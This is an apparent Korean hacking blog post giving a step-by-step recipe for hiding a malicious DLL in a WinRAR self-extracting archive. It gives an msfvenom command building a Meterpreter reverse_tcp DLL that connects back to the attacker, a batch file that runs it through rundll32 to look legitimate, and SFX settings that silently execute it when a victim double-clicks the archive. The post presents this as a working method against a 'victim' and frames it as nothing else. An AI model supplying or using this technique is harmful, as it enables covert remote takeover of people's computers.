본문 바로가기
2. 시스템 해킹 및 모의 해킹

winrar sfx를 활용한 압축파일 자동 dll인젝션

by Robert8478 2023. 12. 27.

sfx 기능은 winrar 압축 파일을 더블클릭만 해도 압축이 자동으로 풀리는 기능입니다.

1> msfvenom -p windows/meterpreter/reverse_tcp lhost=[해커아이피] lport=[리스닝 포트번호] -f dll > virus.dll
위 명령어로 dll 바이러스를 생성해 줍니다.

2. 그 뒤 배치파일을 하나 만들기 위해 leafpad를 열어줍니다.

@echo off
echo [*]Processing Plz wait..
rundll32.exe virus.dll,main    -> virus.dll을 rundll32라는 프로그램처럼 보이게 돌리는것
exit

위 구문들을 넣어주고 virus.bat 파일로 저장해줍니다.
그 후 두 파일을 피해자 윈도우로 옮겨줍니다.

3.두 파일을 같이 드래그해서 우클릭-add to archive 에서 archiving options에 Create sfx archive를 체크
그리고 advanced탭으로 가서 SFX option 클릭 - Setup 탭에서 Run after extraction 란에 virus.bat 라고 써줍니다.
그리고 modes 탭으로 가서 Silent mode에 Hide all 체크, 그리고 Update 탭에가서 Overrite mode에 skip existing files에 체크, 그리고 확인 눌러서 압축파일을 생성합니다.

4.칼리리눅스에서 핸들러를 틀어줍니다. 그 후 피해자 컴퓨터에서 압축파일을 더블클릭하면 인젝션이 성공하며
피해자 컴에서 작업관리자에서 프로세스를 보면 rundll32.exe라는 이름으로 악성 프로세스가 실행되는걸 확인 가능합니다.